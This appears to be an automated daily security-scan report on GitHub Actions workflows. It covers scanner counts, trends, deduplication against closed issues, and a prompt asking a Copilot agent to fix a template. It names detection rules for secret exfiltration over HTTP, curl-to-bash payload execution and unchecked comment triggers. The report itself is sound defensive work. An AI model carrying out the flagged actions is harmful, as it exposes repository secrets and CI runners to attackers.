[static-analysis] Report - 2026-05-26

[github-actions]

Analysis Summary

• Tools Used: zizmor, poutine, actionlint, runner-guard
• Total Findings: 1,672
• Workflows Scanned: 236
• Workflows Affected: 236 (actionlint has at least one issue in every workflow; 46 trigger zizmor; 12 trigger poutine; 15 trigger runner-guard)
• Status: Stable — runner-guard counts unchanged from 2026-05-24; 2 persistent High github-env zizmor findings on dev-hawk.lock.yml remain.

Findings by Tool

Tool	Total	Critical	High	Medium	Low / Note / Info
zizmor (security)	73	0	2	2	69
poutine (supply chain)	24	0	12 (error)	0	12 (notes/warning)
actionlint (linting)	1,293	—	—	—	1,293 (errors)
runner-guard (taint analysis)	282	0	273	9	0

Clustered Findings by Tool and Type

Zizmor Security Findings

Issue Type	Severity	Count	Affected Workflows
github-env	High	2	dev-hawk.lock.yml (lines 734, 1579)
excessive-permissions	Medium	1	dependabot-repair.lock.yml
artipacked	Medium	1	daily-geo-optimizer.lock.yml
obfuscation	Low	25	25 workflows (GH_AW_WIKI_NOTE: ${{ '' }} pattern)
template-injection	Low	4	daily-otel-instrumentation-advisor, daily-reliability-review, daily-token-consumption-report, deep-report
template-injection	Informational	39	ai-moderator (×3), contribution-check (×2), and others
superfluous-actions	Informational	1	1 workflow

Poutine Supply Chain Findings

Issue Type	Severity	Count	Affected Workflows
untrusted_checkout_exec	error	12	dependabot-worker.lock.yml, smoke-workflow-call.lock.yml, smoke-workflow-call-with-inputs.lock.yml (4 each)
github_action_from_unverified_creator_used	note	9	link-check.yml, hippo-embed.lock.yml, super-linter.lock.yml, smoke-codex.lock.yml (×2), agentic-token-audit.lock.yml, dataflow-pr-discussion-dataset.lock.yml, mcp-inspector.lock.yml, copilot-setup-steps.yml
unverified_script_exec	note	2	smoke-codex.lock.yml, copilot-setup-steps.yml
pr_runs_on_self_hosted	warning	1	smoke-copilot-arm.lock.yml

Actionlint Linting Issues

Issue Type	Count	Notes
shellcheck	930	Mostly SC2086 (word splitting) and SC2016 (single-quote expansion) info-level findings
syntax-check	236	Mostly queue: max on concurrency: (unexpected key) across compiled workflows
permissions	111	Permission spec lint warnings
expression	16	GitHub Actions expression syntax issues

Runner-Guard Taint Analysis Findings

Rule ID	Name	Severity	Count	Affected Workflows
RGS-004	Comment-Triggered Workflow Without Author Authorization Check	High	260	q.lock.yml (112), ai-moderator.lock.yml (79), dev-hawk.lock.yml (69)
RGS-012	Secret Exfiltration via Outbound HTTP Request	High	7	daily-model-inventory.lock.yml (3), visual-regression-checker.lock.yml (2), daily-multi-device-docs-tester.lock.yml, docs-noob-tester.lock.yml
RGS-018	Suspicious Payload Execution Pattern	High	6	copilot-setup-steps.yml, daily-cli-performance.lock.yml, daily-sentrux-report.lock.yml, go-logger.lock.yml, smoke-claude.lock.yml, smoke-codex.lock.yml
RGS-005	Excessive Permissions on Untrusted Trigger	Medium	8	ai-moderator.lock.yml (4), q.lock.yml (3), agentic_commands.yml
RGS-019	Step Output Interpolated in run Block	Medium	1	error-message-lint.yml (line 50)

Issues created this run: none (all Critical/High findings are covered by prior closed rule-level issues — see Phase 6 deduplication section below).

Top Priority Issues

1. RGS-004 — Comment-Triggered Workflow Without Author Authorization Check

• Tool: runner-guard
• Severity: High
• Count: 260 (94% of all runner-guard findings)
• Affected: q.lock.yml (112), ai-moderator.lock.yml (79), dev-hawk.lock.yml (69)
• Impact: Comment-triggered workflows that access secrets without an author_association check let any external GitHub user trigger privileged operations.
• Status: Repeat finding — covered by closed issue [static-analysis] RGS-004: Comment-Triggered Workflow Without Author Authorization Check in 16 workflows #29694 (which fixed 16 workflows).
• Reference: https://github.com/Vigilant-LLC/runner-guard

2. Zizmor github-env (High) — persistent regression on dev-hawk.lock.yml

• Tool: zizmor
• Severity: High
• Count: 2 (lines 734 and 1579)
• Affected: dev-hawk.lock.yml
• Impact: Dangerous use of environment file (e.g., writing untrusted content to $GITHUB_ENV) can lead to privilege escalation or command injection.
• Status: Persisting since 2026-05-23 (cleared on 2026-05-22, reappeared 2026-05-23, still present today).
• Reference: (docs.zizmor.sh/redacted)

3. Poutine untrusted_checkout_exec (error) — 12 occurrences

• Tool: poutine
• Severity: error
• Count: 12
• Affected: dependabot-worker.lock.yml, smoke-workflow-call.lock.yml, smoke-workflow-call-with-inputs.lock.yml (4 each)
• Impact: Arbitrary code execution from untrusted code changes. All occurrences are already annotated with # poutine:ignore untrusted_checkout_exec (so they may be acknowledged false positives), but the rule still reports them.
• Reference: https://github.com/boostsecurityio/poutine

Fix Suggestion for obfuscation (Zizmor Low, 25 occurrences)

Selected because it is the largest single rule cluster generated by gh-aw's own templates and a mechanical fix would clean up 25 lock files at once.

Issue: zizmor obfuscation — GH_AW_WIKI_NOTE: ${{ '' }} is flagged as obfuscated usage of GitHub Actions expression syntax.
Severity: Low
Affected Workflows: 25

Prompt to Copilot Agent:

You are fixing a zizmor `obfuscation` warning in the gh-aw compiler.

**Vulnerability**: obfuscation — obfuscated usage of GitHub Actions features
**Rule**: zizmor `obfuscation` — (docs.zizmor.sh/redacted)

**Current Issue**:

The compiled `.lock.yml` files generated by gh-aw contain a step env block that emits a literal empty value using a GitHub Actions expression:

```yaml
env:
  GH_AW_GITHUB_RUN_ID: ${{ github.run_id }}
  GH_AW_GITHUB_WORKSPACE: ${{ github.workspace }}
  GH_AW_WIKI_NOTE: ${{ '' }}
```

zizmor flags `${{ '' }}` as an obfuscated expression — there is no reason to wrap an empty string in a `${{ }}` expression block; it just confuses readers and static analyzers, and matches patterns attackers use to hide intent.

**Required Fix**:

1. Identify the gh-aw compiler/template code that emits `GH_AW_WIKI_NOTE: ${{ '' }}`. Likely candidates: `pkg/workflow/*.go` step-render helpers, or the wiki-note injection template.
2. When the wiki-note value is empty, **omit the env var entirely** instead of emitting an empty string expression. If the var must always be present (e.g., the consuming script tolerates missing better than empty), emit a literal empty string with no expression: `GH_AW_WIKI_NOTE: ""`.
3. Re-compile all `.lock.yml` files (`make recompile` or equivalent) and verify the warning is gone.

**Before**:
```yaml
env:
  GH_AW_WIKI_NOTE: ${{ '' }}
```

**After (preferred — omit when empty)**:
```yaml
env:
  # GH_AW_WIKI_NOTE omitted when value is empty
```

**After (alternative — literal empty string)**:
```yaml
env:
  GH_AW_WIKI_NOTE: ""
```

**Affected workflows** (all 25 will be regenerated from the same template — fix the template, not each lock file by hand):
- agent-performance-analyzer, agentic-token-audit, agentic-token-optimizer, audit-workflows
- copilot-agent-analysis, copilot-cli-deep-research, copilot-pr-nlp-analysis, copilot-pr-prompt-analysis, copilot-session-insights
- daily-cli-performance, daily-code-metrics, daily-news, daily-sentrux-report, daily-testify-uber-super-expert
- dataflow-pr-discussion-dataset, deep-report, delight, discussion-task-miner, firewall-escape
- grumpy-reviewer, issue-triage-agent, mattpocock-skills-reviewer, metrics-collector, pr-code-quality-reviewer, pr-nitpick-reviewer, pr-triage-agent
- security-compliance, security-review, sergo, smoke-agent-all-merged, smoke-agent-all-none
- smoke-agent-public-approved, smoke-agent-public-none, smoke-agent-scoped-approved
- smoke-ci, smoke-codex, smoke-service-ports, workflow-health-manager

**Verification**: After the fix, re-run the static analysis report workflow and confirm `zizmor obfuscation` finding count drops from 25 to 0.

Detailed Findings by Workflow

High-severity highlights

dev-hawk.lock.yml

• zizmor github-env (High) at lines 734, 1579 — dangerous use of environment file
• runner-guard RGS-004 (High) ×69 — comment-triggered workflow without author authorization
• runner-guard RGS-005 (Medium) — excessive permissions on untrusted trigger (covered indirectly)

q.lock.yml

• runner-guard RGS-004 (High) ×112 across many step boundaries (lines 137–~600+)
• runner-guard RGS-005 (Medium) ×3 at workflow root

ai-moderator.lock.yml

• runner-guard RGS-004 (High) ×79
• runner-guard RGS-005 (Medium) ×4
• zizmor template-injection (Informational) ×3 at line 716 (Start MCP Gateway step)

daily-model-inventory.lock.yml

• runner-guard RGS-012 (High) ×3 at lines 1009, 1175, 1239 — outbound HTTP requests to non-GitHub domains with secret access

visual-regression-checker.lock.yml

• runner-guard RGS-012 (High) ×2 at lines 439, 809

copilot-setup-steps.yml

• runner-guard RGS-018 (High) at line 16 — curl ... | bash install pattern
• poutine unverified_script_exec (note) at line 17 — same install pattern
• poutine github_action_from_unverified_creator_used (note) at line 43 — astral-sh/setup-uv

smoke-workflow-call.lock.yml / smoke-workflow-call-with-inputs.lock.yml / dependabot-worker.lock.yml

• poutine untrusted_checkout_exec (error) ×4 each — all annotated with # poutine:ignore untrusted_checkout_exec

Actionlint by-type summary

• shellcheck (930): Top SC codes: SC2086 (Double quote to prevent globbing) and SC2016 (Expressions don't expand in single quotes) — both informational and pervasive in generated run: blocks.
• syntax-check (236): Each generated .lock.yml reports unexpected key "queue" for "concurrency" section. expected one of "cancel-in-progress", "group" (gh-aw's queue: max extension is not part of the standard concurrency schema).
• permissions (111): Workflow permissions linting warnings, scattered across compiled workflows.
• expression (16): GitHub Actions expression syntax issues, mostly in workflow-skill-extractor.lock.yml.

Historical Trends

Daily trend over the last five scans:

Date	Workflows	zizmor	poutine	actionlint	runner-guard	Total
2026-05-21	233	72	21	1,285	305	1,683
2026-05-22	234	71	21	1,286	296	1,674
2026-05-23	234	73	21	1,284	305	1,683
2026-05-24	235	73	21	1,289	282	1,665
2026-05-26	236	73	24	1,293	282	1,672

Delta vs 2026-05-24 (last successful scan; no scan recorded for 2026-05-25):

• zizmor: 0
• poutine: +3 (more github_action_from_unverified_creator_used notes: 6 → 9)
• actionlint: +4 (shellcheck +3, syntax-check +1 with new workflow)
• runner-guard: 0 (RGS-004=260, RGS-012=7, RGS-018=6, RGS-005=8, RGS-019=1 — all unchanged)
• Workflows scanned: 235 → 236 (+1 new workflow)

New Issues

None — no new rule types appeared today. The 3-finding poutine bump is the same github_action_from_unverified_creator_used rule on 3 more action references introduced by recent compilation output, not a new rule class.

Resolved Issues

None resolved since 2026-05-24 — the High github-env regression on dev-hawk.lock.yml continues to persist (3 days running) and all runner-guard counts are flat.

Runner-Guard Analysis

• Total findings: 282 (260 High RGS-004 + 7 High RGS-012 + 6 High RGS-018 + 8 Medium RGS-005 + 1 Medium RGS-019)
• No score/grade emitted by this run's runner-guard output (the report's narrative summary was not present in the compile log).

Deduplication for issue creation: every Critical/High runner-guard finding today matches a prior closed rule-level issue covering the same rule ID + affected file. Per the dedup policy in the runbook, no new issues are created.

Rule	Affected file	Prior closed issue
RGS-004	q.lock.yml, ai-moderator.lock.yml, dev-hawk.lock.yml	#29694 (16-workflow rollup, closed 2026-05-02)
RGS-012	daily-multi-device-docs-tester.lock.yml	#33477 (closed 2026-05-21)
RGS-012	docs-noob-tester.lock.yml	#28488 / #29178 (closed)
RGS-012	daily-model-inventory.lock.yml	#30776 / #30079 (closed)
RGS-012	visual-regression-checker.lock.yml	#30947 / #28626 (closed)
RGS-018	copilot-setup-steps.yml	#33476 (closed 2026-05-21)
RGS-018	daily-cli-performance.lock.yml, daily-sentrux-report.lock.yml, go-logger.lock.yml, smoke-claude.lock.yml, smoke-codex.lock.yml	#30532 (34-workflow rollup, closed 2026-05-06; explicitly lists all five)

Issues created: none.

Recommendations

1. Immediate — Re-investigate the persistent zizmor github-env High finding on dev-hawk.lock.yml:734,1579. It cleared briefly on 2026-05-22, then reappeared and has stayed for 3 days. Likely needs a targeted fix to the dev-hawk template/source.
2. Short-term — Apply the obfuscation fix in the Fix Suggestion section above to eliminate 25 zizmor Low warnings in a single template change.
3. Short-term — Triage the 3 new poutine github_action_from_unverified_creator_used notes (now 9 total); pin SHA-locked verified equivalents where possible.
4. Long-term — RGS-004 (260 occurrences in q/ai-moderator/dev-hawk) keeps recurring despite the fix landed via [static-analysis] RGS-004: Comment-Triggered Workflow Without Author Authorization Check in 16 workflows #29694. Investigate whether the author-association guard is being re-introduced as missing after each rebuild, or whether runner-guard is double-counting steps that already have the guard.
5. Process — Consider gating compile-time on actionlint syntax-check and zizmor High in CI so regressions like dev-hawk's github-env are caught before merge.

Next Steps

• Apply the obfuscation fix template to the gh-aw step renderer (clears 25 Low warnings).
• Re-open or revisit the closed RGS-004 rollup ([static-analysis] RGS-004: Comment-Triggered Workflow Without Author Authorization Check in 16 workflows #29694) — re-occurring in q/ai-moderator/dev-hawk.
• Investigate dev-hawk.lock.yml:734,1579 zizmor github-env regression (3 days running).
• Triage 3 new poutine unverified-creator notes.
• Wire the four scanners (zizmor, poutine, actionlint, runner-guard) into pre-merge CI.

References:

• §26435168567
• §26353464282 (previous scan, 2026-05-24)
• §26325008806 (2026-05-23, regression start)

Generated by 📊 Static Analysis Report · opus47 20M · ◷

• expires on Jun 2, 2026, 6:19 AM UTC